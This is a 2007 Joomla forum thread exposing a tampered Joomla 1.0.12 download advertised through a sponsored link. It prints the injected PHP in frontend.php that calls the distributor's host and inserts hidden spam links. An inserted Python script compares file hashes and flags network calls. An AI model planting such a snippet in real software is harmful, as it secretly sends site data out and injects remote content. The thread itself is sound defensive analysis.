Phishing site CONFIRMED

Discussion regarding Joomla! security issues.

Moderator: General Support Moderators

AlecWeb
Joomla! Fledgling
Posts: 2
Joined: Thu Jun 28, 2007 3:25 pm

Phishing site CONFIRMED

Post by AlecWeb » Thu Jun 28, 2007 6:27 pm

Hi guys,

I found this site today: http://www.templatesbrowser.com/downloa ... UAodhhZbYQ
It was a commercial link in Google when I typed 'joomla' as keyword.

I wasn't able to check it, but I was thinking this could be a potential malicious file with a backdoor.

Just my 2 cents :)

Regards,
Alec
Last edited by rliskey on Thu Jun 28, 2007 8:06 pm, edited 1 time in total.

pe7er
Joomla! Master
Posts: 24986
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, Netherlands

Phishing site CONFIRMED

Post by pe7er » Thu Jun 28, 2007 7:42 pm

AlecWeb wrote: I wasn't able to check it, but I was thinking this could be a potential malicious file with a backdoor.
Yes, it's Joomla 1.0.12 indeed, but one file has been altered: /includes/frontend.php

The following (spyware?) code has been added to the file.
It's included in the function mosMainBody():
$url = "http://get.templatesbrowser.com/j.php?" .
        "host=" . urlencode($_SERVER['HTTP_HOST']) . "&" . "url=" . urlencode($_SERVER['REQUEST_URI']);
$check = @fsockopen("get.templatesbrowser.com", 80, $errno, $errstr, 3);
if($check)
{
  @readfile($url);
  fclose($check);
}


When the mosMainBody is run, the routine creates some URL variable with your server's hostname + your website's URL,
and it tests if it is able to connect to the templatesbrowser's site.
If it is able to create a connection, then some URL (with your hostname + your website's URL) will be retrieved,
and templatesbrowser can store statistics about your site.
Last edited by rliskey on Thu Jun 28, 2007 8:06 pm, edited 1 time in total.
Kind Regards,
Peter Martin, Global Moderator
Company website: https://db8.nl/en/ - Joomla specialist, Nijmegen, Netherlands
The best website: https://the-best-website.com

pe7er
Joomla! Master
Posts: 24986
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, Netherlands

Re: Phishing site?

Post by pe7er » Thu Jun 28, 2007 7:51 pm

I was looking for some more info regarding that website,
and I found an interesting article: http://www.onnoot.com/e/532/Templatesbr ... _WordPress

The article describes the same routine as I found in their Joomla's /includes/frontend.php
It includes hidden commercial links ("link spam") in your site, without your knowing!

btw: an interesting quote from the onnoot.com website:
Templatesbrowser.com apparently does this to increase the pagerank of certain websites. We're not sure if Google falls for this little link spam trick. But if Google does find out that your page contains link spam, you risk being punished. That could mean that your website is removed from Google's search result pages.

rliskey
Joomla! Guru
Posts: 828
Joined: Tue Jun 06, 2006 7:41 am
Location: California, Germany, Norway

Re: Phishing site?

Post by rliskey » Thu Jun 28, 2007 8:03 pm

A great example of why it is important to download applications ONLY from trusted sites!

I've linked to this topic as an example in the Administrators Security Checklist.
http://help.joomla.org/component/option ... temid,268/

EDIT: Topic title changed for increased clarity
Last edited by rliskey on Thu Jun 28, 2007 8:05 pm, edited 1 time in total.

aruba
I've been banned!
Posts: 37
Joined: Fri Jun 15, 2007 8:52 pm

Re: Phishing site?

Post by aruba » Thu Jun 28, 2007 8:55 pm

rliskey wrote: A great example of why it is important to download applications ONLY from trusted sites!

I've linked to this topic as an example in the Administrators Security Checklist.
http://help.joomla.org/component/option ... temid,268/

EDIT: Topic title changed for increased clarity
I've been beating the drum on this since last year :(

It can only get worse IMHO.

As Joomla gets more secure, you will see more and more ingenious ways to subvert that security.

Nowhere is that more true than the templates and extensions directory.

I have always maintained that ALL GPL code submitted to the JED MUST be archived ON JForge.
If there is to be a code update, it is communicated to JForge and the version number is incremented.

Even if Joomla does not supply the download and defers to the developer (who may want a link to their site and registration before you can download - a behavior I deplore), an archived copy can protect users from having spy code introduced to their machine.
After download, they can compare a generated checksum of the code from site 'X' with the Joomla archived version.


There is an incredible risk of hijack and coercive code being introduced to the community.

Note that the above code connects to the home site and loads HTML DATA. IT COULD EASILY HAVE LOADED CODE INSTEAD TO BE RUN IN THE CONTEXT OF YOUR SITE! (by returning a string and executing an EVAL against it)


This is very serious news... I hope we can take time off the "GREAT GPL DEBATE DEBACLE" to handle it properly :(
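
Added example, not part of the original thread or of Joomla's tooling: a sketch of the check discussed above, hashing every file of a downloaded package against a trusted reference copy and listing network-capable PHP calls in any altered file. The directory names, the `tracker.example` host and the list of watched functions are assumptions, and the two sample trees are constructed.

```python
import hashlib, re, tempfile
from pathlib import Path

# PHP calls that can reach a remote host. The snippet quoted in the thread used
# fsockopen and readfile; the other names are assumptions added for coverage.
NET_CALLS = re.compile(r"\b(fsockopen|readfile|file_get_contents|curl_init|fopen)\s*\(")

def manifest(root):
    """Map each file path (relative to root) to its SHA-256 digest."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in sorted(root.rglob("*")) if p.is_file()}

def compare(reference, download):
    """Report files altered, added or missing in download relative to reference."""
    ref, dl = manifest(reference), manifest(download)
    return {
        "altered": sorted(f for f in ref.keys() & dl.keys() if ref[f] != dl[f]),
        "added": sorted(dl.keys() - ref.keys()),
        "missing": sorted(ref.keys() - dl.keys()),
    }

def network_lines(path):
    """Return (line number, text) for lines calling a network-capable function."""
    text = Path(path).read_text(errors="replace")
    return [(n, line.strip()) for n, line in enumerate(text.splitlines(), 1)
            if NET_CALLS.search(line)]

def demo():
    """Build two constructed trees; only includes/frontend.php differs."""
    base = Path(tempfile.mkdtemp())
    clean = "<?php\nfunction mosMainBody() {\n  echo 'body';\n}\n"
    altered = clean.replace("  echo 'body';",
        "  $check = @fsockopen(\"tracker.example\", 80, $errno, $errstr, 3);\n"
        "  if ($check) { @readfile($url); fclose($check); }\n  echo 'body';")
    for name, body in (("reference", clean), ("download", altered)):
        inc = base / name / "includes"
        inc.mkdir(parents=True)
        (inc / "frontend.php").write_text(body)
        (base / name / "index.php").write_text("<?php // constructed sample\n")
    report = compare(base / "reference", base / "download")
    hits = {f: network_lines(base / "download" / f) for f in report["altered"]}
    return report, hits

if __name__ == "__main__":
    print(demo())
```

The comparison is only as good as the reference copy, so the reference tree has to come from the project's own download site.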

AlecWeb
Joomla! Fledgling
Posts: 2
Joined: Thu Jun 28, 2007 3:25 pm

Re: Phishing site CONFIRMED

Post by AlecWeb » Thu Jun 28, 2007 11:24 pm

Actually the real reason why this scared me was, the way it's shown in Google (using keywords 'download joomla'):

It is a commercial/sponsored link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com".
You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla.
So any user that doesn't pay attention will download this piece of malware.

Maybe the Joomla team could inform Google about this abuse, before too many users follow this link?

Anyway, thanks for the great piece of software!
(btw: I always use the real joomla.org to download Joomla! :)

Regards,
Alec

The screenshots:
http://alecweb.ulyssis.org/sponsered-link-2.png
http://alecweb.ulyssis.org/sponsered-link-joomla.png

pe7er
Joomla! Master
Posts: 24986
Joined: Thu Aug 18, 2005 8:55 pm
Location: Nijmegen, Netherlands

Re: Phishing site CONFIRMED

Post by pe7er » Fri Jun 29, 2007 2:34 pm

AlecWeb wrote: Actually the real reason why this scared me was, the way it's shown in Google (using keywords 'download joomla'):

It is a commercial/sponsored link and it's written "joomla.org" underneath it, instead of "templatesbrowser.com".
You can see on this screenshot that when I go over the link with the mouse, the statusbar shows templatesbrowser.com instead of Joomla.
So any user that doesn't pay attention will download this piece of malware.

Maybe the Joomla team could inform Google about this abuse, before too many users follow this link?
The latest news:
  • The sponsored link @ Google is no longer there...
  • And the download link is 404.
Thanks to all who helped solve this issue
(& special thanks to Wordpress user Onnoot for his efforts)
:)

